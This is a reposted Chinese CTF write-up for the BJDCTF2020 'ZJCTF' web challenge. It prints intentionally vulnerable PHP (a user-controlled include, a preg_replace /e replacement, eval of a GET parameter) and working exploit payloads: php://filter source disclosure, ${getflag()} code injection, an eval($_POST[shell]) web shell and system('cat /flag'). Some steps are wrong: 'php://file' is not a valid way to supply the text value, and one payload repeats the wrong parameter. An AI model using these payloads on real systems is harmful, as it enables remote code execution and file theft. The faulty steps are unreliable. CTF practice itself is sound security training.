BUU-WEB-[BJDCTF2020]ZJCTF,不过如此

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[BJDCTF2020]ZJCTF,不过如此相关的知识,希望对你有一定的参考价值。

[BJDCTF2020]ZJCTF,不过如此

php代码审计。

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

绕过第一个if:
1.以get方式提交两个参数,text和file。
2.text的主要内容是I have a dream。
3.file中不能包含flag。
直接构建payload:

text=I have a dream&text=next.php

无法传入。
于是通过php://file传入text的内容。
再将next.php的内容以php://filter的方式读取。

text=php://file&file=php://filter/read/convert.base64-encode/resource=next.php

在这里插入图片描述
成功读取next.php的base64的源码密文。

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

绕过preg_replace函数
构建payload:

/next.php?\\S*=${getflag()}&cmd=show_source("/flag");

在这里插入图片描述
也可以通过POST传入。

next.php?\\S*=${eval($_POST[shell])}

再以POST方式提交执行命令:

#POST
shell=system("cat /flag");

在这里插入图片描述

以上是关于BUU-WEB-[BJDCTF2020]ZJCTF,不过如此的主要内容,如果未能解决你的问题,请参考以下文章

[BJDCTF2020]ZJCTF,不过如此

[BJDCTF2020]ZJCTF,不过如此

[BJDCTF2020]ZJCTF,不过如此

[BJDCTF2020]ZJCTF,不过如此

BUU-WEB-[BJDCTF2020]EasySearch

攻防世界 favorite_number mfw[BJDCTF2020]ZJCTF,不过如此